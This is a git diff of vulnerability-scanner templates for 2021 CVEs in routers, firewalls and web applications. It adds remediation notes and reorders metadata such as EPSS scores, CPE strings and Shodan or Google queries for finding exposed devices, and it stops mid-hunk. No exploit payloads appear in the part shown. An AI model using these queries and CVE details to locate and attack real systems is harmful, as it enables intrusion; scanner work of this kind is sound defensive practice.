http/cves/2021/CVE-2021-35587.yaml | 10 ++++++---- http/cves/2021/CVE-2021-3577.yaml | 4 +++- http/cves/2021/CVE-2021-36260.yaml | 6 ++++-- http/cves/2021/CVE-2021-36356.yaml | 4 +++- http/cves/2021/CVE-2021-36380.yaml | 4 +++- http/cves/2021/CVE-2021-36450.yaml | 8 +++++--- http/cves/2021/CVE-2021-3654.yaml | 4 +++- http/cves/2021/CVE-2021-36580.yaml | 8 +++++--- http/cves/2021/CVE-2021-36748.yaml | 6 ++++-- http/cves/2021/CVE-2021-36749.yaml | 4 +++- http/cves/2021/CVE-2021-36873.yaml | 8 +++++--- http/cves/2021/CVE-2021-37216.yaml | 4 +++- http/cves/2021/CVE-2021-37304.yaml | 10 ++++++---- http/cves/2021/CVE-2021-37305.yaml | 10 ++++++---- http/cves/2021/CVE-2021-37416.yaml | 8 +++++--- http/cves/2021/CVE-2021-37538.yaml | 6 ++++-- http/cves/2021/CVE-2021-37573.yaml | 4 +++- http/cves/2021/CVE-2021-37580.yaml | 4 +++- http/cves/2021/CVE-2021-37589.yaml | 8 +++++--- http/cves/2021/CVE-2021-37704.yaml | 4 +++- http/cves/2021/CVE-2021-37833.yaml | 4 +++- http/cves/2021/CVE-2021-38314.yaml | 6 ++++-- http/cves/2021/CVE-2021-38540.yaml | 8 ++++---- http/cves/2021/CVE-2021-38647.yaml | 4 ++-- http/cves/2021/CVE-2021-38702.yaml | 4 +++- http/cves/2021/CVE-2021-38704.yaml | 6 ++++-- http/cves/2021/CVE-2021-38751.yaml | 4 +++- http/cves/2021/CVE-2021-39141.yaml | 4 +++- http/cves/2021/CVE-2021-39144.yaml | 4 +++- http/cves/2021/CVE-2021-39146.yaml | 4 +++- http/cves/2021/CVE-2021-39152.yaml | 4 +++- http/cves/2021/CVE-2021-39165.yaml | 8 +++++--- http/cves/2021/CVE-2021-39211.yaml | 4 ++-- http/cves/2021/CVE-2021-39226.yaml | 6 +++--- http/cves/2021/CVE-2021-39312.yaml | 6 +++--- http/cves/2021/CVE-2021-39316.yaml | 6 ++++-- http/cves/2021/CVE-2021-39320.yaml | 8 +++++--- http/cves/2021/CVE-2021-39322.yaml | 6 ++++-- http/cves/2021/CVE-2021-39327.yaml | 6 ++++-- http/cves/2021/CVE-2021-39350.yaml | 6 ++++-- http/cves/2021/CVE-2021-39433.yaml | 4 +++- http/cves/2021/CVE-2021-39501.yaml | 4 +++- http/cves/2021/CVE-2021-40149.yaml | 8 +++++--- http/cves/2021/CVE-2021-40150.yaml | 8 +++++--- http/cves/2021/CVE-2021-40323.yaml | 4 +++- http/cves/2021/CVE-2021-40438.yaml | 4 ++-- http/cves/2021/CVE-2021-40539.yaml | 4 ++-- http/cves/2021/CVE-2021-40542.yaml | 6 ++++-- http/cves/2021/CVE-2021-40661.yaml | 10 ++++++---- http/cves/2021/CVE-2021-40822.yaml | 6 ++++-- http/cves/2021/CVE-2021-40856.yaml | 4 +++- http/cves/2021/CVE-2021-40859.yaml | 6 ++++-- http/cves/2021/CVE-2021-40868.yaml | 4 ++-- http/cves/2021/CVE-2021-40870.yaml | 4 +++- http/cves/2021/CVE-2021-40875.yaml | 6 ++++-- http/cves/2021/CVE-2021-40908.yaml | 6 ++++-- http/cves/2021/CVE-2021-40960.yaml | 4 +++- http/cves/2021/CVE-2021-40968.yaml | 8 ++++---- http/cves/2021/CVE-2021-40969.yaml | 8 ++++---- http/cves/2021/CVE-2021-40970.yaml | 8 ++++---- http/cves/2021/CVE-2021-40971.yaml | 8 ++++---- http/cves/2021/CVE-2021-40972.yaml | 8 ++++---- http/cves/2021/CVE-2021-40973.yaml | 8 ++++---- http/cves/2021/CVE-2021-40978.yaml | 4 +++- http/cves/2021/CVE-2021-41174.yaml | 6 +++--- http/cves/2021/CVE-2021-41192.yaml | 6 ++++-- http/cves/2021/CVE-2021-41266.yaml | 4 ++-- http/cves/2021/CVE-2021-41277.yaml | 8 ++++---- http/cves/2021/CVE-2021-41282.yaml | 6 +++--- http/cves/2021/CVE-2021-41291.yaml | 4 +++- http/cves/2021/CVE-2021-41293.yaml | 4 +++- http/cves/2021/CVE-2021-41349.yaml | 4 +++- http/cves/2021/CVE-2021-41381.yaml | 4 +++- http/cves/2021/CVE-2021-41432.yaml | 8 +++++--- http/cves/2021/CVE-2021-41460.yaml | 8 +++++--- http/cves/2021/CVE-2021-41467.yaml | 4 +++- http/cves/2021/CVE-2021-41569.yaml | 4 +++- http/cves/2021/CVE-2021-41648.yaml | 4 +++- http/cves/2021/CVE-2021-41649.yaml | 4 +++- http/cves/2021/CVE-2021-41653.yaml | 4 ++-- http/cves/2021/CVE-2021-41691.yaml | 2 ++ http/cves/2021/CVE-2021-41773.yaml | 8 +++++--- http/cves/2021/CVE-2021-41826.yaml | 4 +++- http/cves/2021/CVE-2021-41878.yaml | 6 ++++-- http/cves/2021/CVE-2021-4191.yaml | 4 +++- http/cves/2021/CVE-2021-41951.yaml | 4 +++- http/cves/2021/CVE-2021-42013.yaml | 6 +++--- http/cves/2021/CVE-2021-42063.yaml | 8 +++++--- http/cves/2021/CVE-2021-42071.yaml | 4 +++- http/cves/2021/CVE-2021-42192.yaml | 4 +++- http/cves/2021/CVE-2021-42237.yaml | 6 +++--- http/cves/2021/CVE-2021-42258.yaml | 4 +++- http/cves/2021/CVE-2021-42551.yaml | 4 +++- http/cves/2021/CVE-2021-42565.yaml | 4 +++- http/cves/2021/CVE-2021-42566.yaml | 4 +++- http/cves/2021/CVE-2021-42567.yaml | 6 ++++-- http/cves/2021/CVE-2021-42627.yaml | 8 +++++--- http/cves/2021/CVE-2021-42663.yaml | 6 ++++-- http/cves/2021/CVE-2021-42667.yaml | 6 ++++-- http/cves/2021/CVE-2021-42887.yaml | 6 ++++-- http/cves/2021/CVE-2021-43062.yaml | 4 +++- http/cves/2021/CVE-2021-43287.yaml | 6 +++--- http/cves/2021/CVE-2021-43421.yaml | 6 ++++-- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 4 +++- http/cves/2021/CVE-2021-43510.yaml | 6 ++++-- http/cves/2021/CVE-2021-43574.yaml | 8 +++++--- http/cves/2021/CVE-2021-43725.yaml | 8 ++++---- http/cves/2021/CVE-2021-43734.yaml | 8 +++++--- http/cves/2021/CVE-2021-43778.yaml | 4 ++-- http/cves/2021/CVE-2021-43798.yaml | 8 ++++---- http/cves/2021/CVE-2021-43810.yaml | 4 ++-- http/cves/2021/CVE-2021-44077.yaml | 4 +++- http/cves/2021/CVE-2021-44138.yaml | 8 +++++--- http/cves/2021/CVE-2021-44139.yaml | 6 ++++-- http/cves/2021/CVE-2021-44152.yaml | 10 ++++++---- http/cves/2021/CVE-2021-44228.yaml | 4 ++-- http/cves/2021/CVE-2021-44427.yaml | 4 ++-- http/cves/2021/CVE-2021-44451.yaml | 8 ++++---- http/cves/2021/CVE-2021-44515.yaml | 4 ++-- http/cves/2021/CVE-2021-44528.yaml | 4 +++- http/cves/2021/CVE-2021-44529.yaml | 6 ++++-- http/cves/2021/CVE-2021-44848.yaml | 4 +++- http/cves/2021/CVE-2021-45043.yaml | 6 ++++-- http/cves/2021/CVE-2021-45046.yaml | 4 +++- http/cves/2021/CVE-2021-45092.yaml | 4 +++- http/cves/2021/CVE-2021-45232.yaml | 4 ++-- http/cves/2021/CVE-2021-45380.yaml | 6 ++++-- http/cves/2021/CVE-2021-45422.yaml | 8 +++++--- http/cves/2021/CVE-2021-45428.yaml | 8 +++++--- http/cves/2021/CVE-2021-45967.yaml | 4 +++- http/cves/2021/CVE-2021-45968.yaml | 4 +++- http/cves/2021/CVE-2021-46005.yaml | 4 +++- http/cves/2021/CVE-2021-46068.yaml | 6 ++++-- http/cves/2021/CVE-2021-46069.yaml | 6 ++++-- http/cves/2021/CVE-2021-46071.yaml | 6 ++++-- http/cves/2021/CVE-2021-46072.yaml | 6 ++++-- http/cves/2021/CVE-2021-46073.yaml | 6 ++++-- http/cves/2021/CVE-2021-46107.yaml | 8 ++++---- http/cves/2021/CVE-2021-46379.yaml | 6 ++++-- http/cves/2021/CVE-2021-46381.yaml | 4 +++- http/cves/2021/CVE-2021-46387.yaml | 6 ++++-- http/cves/2021/CVE-2021-46417.yaml | 8 +++++--- http/cves/2021/CVE-2021-46422.yaml | 8 +++++--- http/cves/2021/CVE-2021-46424.yaml | 8 +++++--- http/cves/2021/CVE-2021-46704.yaml | 8 +++++--- .../{CVE-2023-23492.yaml => CVE-2023-23492 2.yaml} | 0 421 files changed, 1553 insertions(+), 877 deletions(-) rename http/cves/2023/{CVE-2023-23492.yaml => CVE-2023-23492 2.yaml} (100%) diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index c0db99bccf..bdeb6668e5 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device. + remediation: | + Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability. reference: - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/ - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-1472 cwe-id: CWE-119,CWE-287 epss-score: 0.97285 - cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99783 + cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Cisco rv340" verified: true + max-request: 1 vendor: cisco product: rv160_firmware + shodan-query: http.html:"Cisco rv340" tags: packetstorm,seclists,auth-bypass,injection,cve,cve2021,cisco,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index b4ca3538a3..c819787955 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://nvd.nist.gov/vuln/detail/CVE-2021-1497 @@ -19,8 +21,8 @@ info: cve-id: CVE-2021-1497 cwe-id: CWE-78 epss-score: 0.97531 - cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* epss-percentile: 0.99984 + cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index b3df34df0e..058d924a80 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://nvd.nist.gov/vuln/detail/CVE-2021-1498 @@ -19,8 +21,8 @@ info: cve-id: CVE-2021-1498 cwe-id: CWE-78 epss-score: 0.97531 - cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* epss-percentile: 0.99984 + cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 5bee672311..50d16bfb90 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user. + remediation: | + Apply the necessary security patches or updates provided by Cisco reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-1499 cwe-id: CWE-306 epss-score: 0.97246 - cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* epss-percentile: 0.99761 + cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index db89a1998e..e4f0d0abe8 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site. + remediation: | + Apply the latest security patch or update provided by SonicWall to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/50414 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-20031 cwe-id: CWE-601 epss-score: 0.01202 - cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* epss-percentile: 0.83464 + cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"auth.html" intitle:"SonicWall" vendor: sonicwall product: sonicos + google-query: inurl:"auth.html" intitle:"SonicWall" tags: sonicwall,redirect,edb,packetstorm,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index 2e4bae8912..eed9339c24 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0, jbaines-r7 severity: critical description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + remediation: | + Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability. reference: - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-20038 cwe-id: CWE-787,CWE-121 epss-score: 0.96076 - cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:* epss-percentile: 0.99265 + cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sonicwall diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index 11b4a2f593..100a7fcdce 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. + remediation: | + Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-20090 cwe-id: CWE-22 epss-score: 0.97441 - cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99913 + cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: buffalo diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 4fe2e753aa..b64a33fb89 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution. + remediation: | + Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability. reference: - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - https://www.tenable.com/security/research/tra-2021-13 @@ -16,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-20091 epss-score: 0.00814 - cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.79621 + cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: buffalo diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index dc02072894..13f9912daa 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. + remediation: | + Apply the latest firmware update provided by Buffalo to fix the access control issue. reference: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-20092 cwe-id: CWE-287 epss-score: 0.01372 - cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.84606 + cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: buffalo diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 76c35a9adc..fe329b1341 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -5,6 +5,8 @@ info: author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. + remediation: | + Upgrade TCExam to a version higher than 14.8.1 to mitigate the vulnerability. reference: - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-20114 cwe-id: CWE-425 epss-score: 0.0178 - cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* epss-percentile: 0.86493 + cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tecnick diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 23c6ed4247..fa7cd9e1f0 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B. reference: - https://www.tenable.com/security/research/tra-2021-42 - https://nvd.nist.gov/vuln/detail/CVE-2021-20123 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-20123 cwe-id: CWE-22 epss-score: 0.05307 - cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* epss-percentile: 0.92084 + cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.html:"VigorConnect" + max-request: 2 vendor: draytek product: vigorconnect + shodan-query: http.html:"VigorConnect" tags: cve,cve2021,draytek,lfi,vigorconnect,tenable http: diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 9e1fe0540e..054fa75bf0 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + remediation: | + Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3. reference: - https://www.tenable.com/security/research/tra-2021-42 - https://www.draytek.com/products/vigorconnect/ @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-20124 cwe-id: CWE-22 epss-score: 0.02141 - cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* epss-percentile: 0.87833 + cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: http.html:"VigorConnect" + max-request: 2 vendor: draytek product: vigorconnect + shodan-query: http.html:"VigorConnect" tags: cve,cve2021,draytek,lfi,vigorconnect,tenable http: diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 2349bb462f..2f09eb4547 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137 - https://www.tenable.com/security/research/tra-2021-51 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-20137 cwe-id: CWE-79 epss-score: 0.3285 - cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.96459 + cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gryphonconnect diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 81455435b1..39b290fd00 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + remediation: | + Update the router firmware to the latest version to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-20150 cwe-id: CWE-306 epss-score: 0.16176 - cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* epss-percentile: 0.95283 + cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.html:"TEW-827DRU" vendor: trendnet product: tew-827dru_firmware + shodan-query: http.html:"TEW-827DRU" tags: disclosure,router,tenable,cve,cve2021,trendnet http: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index dc8fd28d25..5b03d8cd54 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. + remediation: | + Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 - cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* epss-percentile: 0.83527 + cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.html:"TEW-827DRU" vendor: trendnet product: tew-827dru_firmware + shodan-query: http.html:"TEW-827DRU" tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet variables: password: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 72554c56b8..980ddeec6a 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -5,19 +5,19 @@ info: author: gy741 severity: high description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.' + remediation: Upgrade to newer release of the RAX43 firmware. reference: - https://www.tenable.com/security/research/tra-2021-55 - https://nvd.nist.gov/vuln/detail/CVE-2021-20166 - https://nvd.nist.gov/vuln/detail/CVE-2021-20167 - remediation: Upgrade to newer release of the RAX43 firmware. classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8 cve-id: CVE-2021-20167 cwe-id: CWE-77 epss-score: 0.95111 - cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* epss-percentile: 0.99023 + cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index ef9fedbb87..3e443f5567 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact. + remediation: | + Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher). reference: - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 @@ -19,14 +21,14 @@ info: cve-id: CVE-2021-20323 cwe-id: CWE-79 epss-score: 0.00222 - cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* epss-percentile: 0.59851 + cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: - max-request: 4 - shodan-query: html:"Keycloak" verified: true + max-request: 4 vendor: redhat product: keycloak + shodan-query: html:"Keycloak" tags: cve,cve2021,keycloak,xss http: diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index b83b87d186..4a4b37648e 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors. + remediation: | + Update to the latest version of WordPress Quiz and Survey Master plugin (7.1.14) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf - https://quizandsurveymaster.com/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-20792 cwe-id: CWE-79 epss-score: 0.002 - cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* epss-percentile: 0.57161 + cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: 